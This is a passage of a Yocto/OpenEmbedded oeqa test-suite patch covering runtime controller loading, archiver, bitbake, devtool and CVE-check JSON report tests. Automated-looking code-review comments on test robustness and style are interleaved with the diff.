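Review bot: `keyboard_mouse_simulation` and `set_suspend` both end with `return self.assertEqual(...)`, which always returns None, so the `return` suggests a result that `test_USB_Hid_input` cannot use; drop it in both helpers. `set_suspend` also repeats, line for line, the `sudo rtcwake -m mem -s 10` helper that appears in the preceding test case file on this page, including the "Failed to suspends" wording; a shared helper would keep the two in step. Neither helper has a docstring, and the commands appear to assume passwordless `sudo` and an X server on `DISPLAY=:0` on the target, which is worth stating in one.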
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
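--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
 #
 
 import os
+import sys
 
 from oeqa.core.context import OETestContext, OETestContextExecutor
 from oeqa.core.target.ssh import OESSHTarget
@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
  % self.default_target_type)
  runtime_group.add_argument('--target-ip', action='store',
  default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
  % self.default_target_ip)
  runtime_group.add_argument('--server-ip', action='store',
  default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address of the test host from test target machine, default: %s" \
  % self.default_server_ip)
 
  runtime_group.add_argument('--host-dumper-dir', action='store',
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
  # XXX: Don't base your targets on this code it will be refactored
  # in the near future.
  # Custom target module loading
- target_modules_path = kwargs.get('target_modules_path', '')
- controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
+ controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
  target = controller(logger, target_ip, server_ip, **kwargs)
 
  return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
  # AttributeError raised if not found.
  # ImportError raised if a provided module can not be imported.
  @staticmethod
- def getControllerModule(target, target_modules_path):
- controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path)
+ def getControllerModule(target):
+ controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
  controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
  return controller
 
  # Return a list of all python modules in lib/oeqa/controllers for each
  # layer in bbpath
  @staticmethod
- def _getControllerModulenames(target_modules_path):
+ def _getControllerModulenames():
 
  controllerslist = []
 
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
  else:
  raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
 
- extpath = target_modules_path.split(':')
- for p in extpath:
- controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
+ for p in sys.path:
+ controllerpath = os.path.join(p, 'oeqa', 'controllers')
  if os.path.exists(controllerpath):
  add_controller_list(controllerpath)
  return controllerslist
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
  # Search for and return a controller or None from given module name
  @staticmethod
  def _loadControllerFromModule(target, modulename):
- obj = None
- # import module, allowing it to raise import exception
- module = __import__(modulename, globals(), locals(), [target])
- # look for target class in the module, catching any exceptions as it
- # is valid that a module may not have the target class.
  try:
- obj = getattr(module, target)
- except:
- obj = None
- return obj
+ import importlib
+ module = importlib.import_module(modulename)
+ return getattr(module, target)
+ except AttributeError:
+ return None
 
  @staticmethod
  def readPackagesManifest(manifest):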
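Review bot: `_getControllerModulenames` now walks every entry of `sys.path` and registers any `oeqa/controllers` directory it finds, so which controller modules can be imported depends on the interpreter's search path rather than on an explicit argument. An empty or relative `sys.path` entry makes `os.path.join(p, 'oeqa', 'controllers')` resolve against the current working directory, which would let a directory under the invoking user's cwd supply a controller; consider skipping such entries with `if not os.path.isabs(p): continue`, or restricting the walk to the layer library paths. In `_loadControllerFromModule`, `import importlib` sits inside the `try` and would read better at module level, and the removed comments explaining why a missing attribute is tolerated should be kept in some form. Separately, the `--server-ip` argument in the second hunk still passes `default=self.default_target_ip` while its help text prints `self.default_server_ip`, which looks like a copy-paste slip worth fixing while the help string is being touched. `readPackagesManifest` continues outside the last hunk.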
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
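--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
  """
  def setUp(self):
  if not (self.tc.hasHostPackage("nativesdk-meson")):
- raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson")
+ raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
 
  def test_epoxy(self):
  with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir: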
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
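--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
  src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
 
  # Check that include_recipe was included
- included_present = len(glob.glob(src_path + '/%s-*' % include_recipe))
+ included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
  self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
 
  # Check that exclude_recipe was excluded
- excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe))
+ excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
  self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
 
  def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
  src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
 
  # Check that target_recipe was included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
  self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
 
  # Check that native_recipe was excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
  self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
 
  def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
  src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
 
  # Check that target_recipe[0] and native_recipes[1] were included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0]))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
  self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
 
- included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1]))
+ included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
  self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
 
  # Check that native_recipes[0] and target_recipes[1] were excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0]))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
  self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
 
- excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1]))
+ excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
  self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
 
 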
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
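--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
 
 class BitbakeLayers(OESelftestTestCase):
 
+ def test_bitbakelayers_layerindexshowdepends(self):
+ result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
+ find_in_contents = re.search("openembedded-core", result.output)
+ self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
+
  def test_bitbakelayers_showcrossdepends(self):
  result = runCmd('bitbake-layers show-cross-depends')
  self.assertIn('aspell', result.output)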
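Review bot: `test_bitbakelayers_layerindexshowdepends` checks a literal substring with `re.search("openembedded-core", result.output)` and `assertTrue`, while the neighbouring `test_bitbakelayers_showcrossdepends` uses `assertIn` for the same kind of check. `self.assertIn('openembedded-core', result.output)` is consistent with the rest of the class, reports the searched text on failure without a hand-built message, and does not depend on `re` being imported (the import block is outside this hunk). `layerindex-show-depends` presumably queries a remote layer index, so a one-line comment noting that the test needs network access would help whoever triages a failure.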
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
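--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
  self.delete_recipeinc('man-db')
  self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
  self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
- line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
- self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
-doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
 
  def test_rename_downloaded_file(self):
  # TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
 """)
  self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
 
- data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
+ data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
  self.write_recipeinc('aspell', data)
  result = bitbake('-f -c fetch aspell', ignore_status=True)
  self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
  self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
 
  def test_prefile(self):
+ # Test when the prefile does not exist
+ result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
+ # Test when the prefile exists
  preconf = os.path.join(self.builddir, 'conf/prefile.conf')
  self.track_for_cleanup(preconf)
  ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
  self.assertIn('localconf', result.output)
 
  def test_postfile(self):
+ # Test when the postfile does not exist
+ result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
+ # Test when the postfile exists
  postconf = os.path.join(self.builddir, 'conf/postfile.conf')
  self.track_for_cleanup(postconf)
  ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")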
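Review bot: The new negative checks in `test_prefile` and `test_postfile` pass `conf/prefile.conf` and `conf/postfile.conf` as paths relative to the current directory, while the positive half of each test creates a file of the same name under `self.builddir`. The negative check therefore only holds if no such file is left over from an earlier run, and `track_for_cleanup` is registered after it, so an interrupted previous run would make the first assertion fail for a reason unrelated to bitbake. Pointing the negative check at a name the test never creates (for example the constructed name `conf/prefile-missing.conf`) would make it independent of leftover state. Both function bodies continue outside their hunks.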
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
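--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
 class DiskMonTest(OESelftestTestCase):
 
  def test_stoptask_behavior(self):
- self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
  res = bitbake("delay -c delay", ignore_status = True)
  self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
  self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
  res = bitbake("delay -c delay", ignore_status = True)
  self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
  self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
  res = bitbake("delay -c delay")
  self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
 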
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
index 3f343a2841..22ffeffd29 100644
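--- a/meta/lib/oeqa/selftest/cases/cve_check.py
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -1,9 +1,13 @@
-from oe.cve_check import Version
+import json
+import os
 from oeqa.selftest.case import OESelftestTestCase
+from oeqa.utils.commands import bitbake, get_bb_vars
 
 class CVECheck(OESelftestTestCase):
 
  def test_version_compare(self):
+ from oe.cve_check import Version
+
  result = Version("100") > Version("99")
  self.assertTrue( result, msg="Failed to compare version '100' > '99'")
  result = Version("2.3.1") > Version("2.2.3")
@@ -34,3 +38,183 @@ class CVECheck(OESelftestTestCase):
  self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
  result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
  self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
+
+ # consider the trailing "p" and "patch" as patched released when comparing
+ result = Version("1.0","patch") < Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
+ result = Version("1.0p2","patch") > Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
+ result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
+
+
+ def test_convert_cve_version(self):
+ from oe.cve_check import convert_cve_version
+
+ # Default format
+ self.assertEqual(convert_cve_version("8.3"), "8.3")
+ self.assertEqual(convert_cve_version(""), "")
+
+ # OpenSSL format version
+ self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
+
+ # OpenSSH format
+ self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
+ self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
+
+ # Linux kernel format
+ self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
+ self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
+
+
+ def test_recipe_report_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ self.assertIn("CVE-2008-1687", found_cves)
+ self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_image_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ print(report_json)
+ try:
+ os.remove(report_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("core-image-minimal-initramfs")
+ self.assertExists(report_json)
+
+ # Check that the summary report lists at least one package
+ with open(report_json) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertGreater(len(report["package"]), 1)
+
+ # Check that a random recipe wrote a recipe report to deploy/cve/
+ recipename = report["package"][0]["name"]
+ recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
+ self.assertExists(recipe_report)
+ with open(recipe_report) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ self.assertEqual(report["package"][0]["name"], recipename)
+
+
+ def test_recipe_report_json_unpatched(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "0"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ #m4 had only Patched CVEs, so the issues array will be empty
+ self.assertEqual(package["issue"], [])
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_recipe_report_json_ignored(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("logrotate -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "logrotate")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ # m4 CVE should not be in logrotate
+ self.assertNotIn("CVE-2008-1687", found_cves)
+ # logrotate has both Patched and Ignored CVEs
+ self.assertIn("CVE-2011-1098", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
+ self.assertIn("CVE-2011-1548", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
+ self.assertIn("CVE-2011-1549", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
+ self.assertIn("CVE-2011-1550", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)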
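Review bot: In `test_recipe_report_json`, `test_recipe_report_json_unpatched` and `test_recipe_report_json_ignored` the two `os.remove` calls share one `try`, so when `summary_json` is already absent the `FileNotFoundError` skips the removal of `recipe_json`. A stale per-recipe report from an earlier run can then satisfy `assertExists` and the status checks, which defeats a test meant to prove that this run produced the CVE report. Each file should be removed independently, as in the excerpt below, in all three tests. Smaller points: `test_image_json` keeps a debugging `print(report_json)`, its comment says "at least one package" while `assertGreater(len(report["package"]), 1)` requires two, `vars` shadows the builtin, and the helper in the logrotate test is still named `check_m4_json`.

```python
        vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
        # ... unchanged: summary_json / recipe_json path construction ...
        # Remove each stale report on its own so a missing summary file
        # cannot leave an old recipe report behind.
        for stale in (summary_json, recipe_json):
            try:
                os.remove(stale)
            except FileNotFoundError:
                pass
```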
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index 0985434238..9efe342a0d 100644
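--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
 import tempfile
 import glob
 import fnmatch
+import unittest
 
 import oeqa.utils.ftools as ftools
 from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
  canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
  edited_layers.append(layerpath)
  oldmetapath = os.path.realpath(layerpath)
+
+ # when downloading poky from tar.gz some tests will be skipped (BUG 12389)
+ try:
+ runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
+ except:
+ raise unittest.SkipTest("devtool tests require folder to be a git repo")
+
  result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
  oldreporoot = result.output.rstrip()
  newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
  checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
  checkvars['S'] = '${WORKDIR}/git'
  checkvars['PV'] = '0.1+git${SRCPV}'
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
  checkvars['SRCREV'] = srcrev
  checkvars['DEPENDS'] = set(['dbus'])
  self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
  tempdir = tempfile.mkdtemp(prefix='devtoolqa')
  self.track_for_cleanup(tempdir)
  url = 'gitsm://git.yoctoproject.org/mraa'
+ url_branch = '%s;branch=master' % url
  checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
  testrecipe = 'mraa'
  srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
  checkvars = {}
  checkvars['S'] = '${WORKDIR}/git'
  checkvars['PV'] = '1.0+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
  checkvars['SRCREV'] = '${AUTOREV}'
  self._test_recipe_contents(recipefile, checkvars, [])
  # Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
  checkvars = {}
  checkvars['S'] = '${WORKDIR}/git'
  checkvars['PV'] = '1.5+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
  checkvars['SRCREV'] = checkrev
  self._test_recipe_contents(recipefile, checkvars, [])
 
@@ -880,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
  self._check_repo_status(os.path.dirname(recipefile), expected_status)
 
  result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
- addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+ addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
  srcurilines = src_uri.split()
  srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
  srcurilines.append('"')
@@ -1322,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
  # Now really test deploy-target
  result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
  # Run a test command to see if it was installed properly
- sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
  result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
  # Check if it deployed all of the files with the right ownership/perms
  # First look on the host - need to do this under pseudo to get the correct ownership/perms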
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
63 return True 63 return True
64 return False 64 return False
65 65
66 feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n' 66 feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
67 self.write_config(feature) 67 self.write_config(feature)
68 68
69 with bb.tinfoil.Tinfoil() as tinfoil: 69 with bb.tinfoil.Tinfoil() as tinfoil:
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
33 33
34 ptestsuite = "glibc-user" if ssh is None else "glibc" 34 ptestsuite = "glibc-user" if ssh is None else "glibc"
35 self.ptest_section(ptestsuite) 35 self.ptest_section(ptestsuite)
36 with open(os.path.join(builddir, "tests.sum"), "r") as f: 36 with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
37 for test, result in parse_values(f): 37 for test, result in parse_values(f):
38 self.ptest_result(ptestsuite, test, result) 38 self.ptest_result(ptestsuite, test, result)
39 39
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
41 with contextlib.ExitStack() as s: 41 with contextlib.ExitStack() as s:
42 # use the base work dir, as the nfs mount, since the recipe directory may not exist 42 # use the base work dir, as the nfs mount, since the recipe directory may not exist
43 tmpdir = get_bb_var("BASE_WORKDIR") 43 tmpdir = get_bb_var("BASE_WORKDIR")
44 nfsport, mountport = s.enter_context(unfs_server(tmpdir)) 44 nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
45 45
46 # build core-image-minimal with required packages 46 # build core-image-minimal with required packages
47 default_installed_packages = [ 47 default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
61 bitbake("core-image-minimal") 61 bitbake("core-image-minimal")
62 62
63 # start runqemu 63 # start runqemu
64 qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic")) 64 qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
65 65
66 # validate that SSH is working 66 # validate that SSH is working
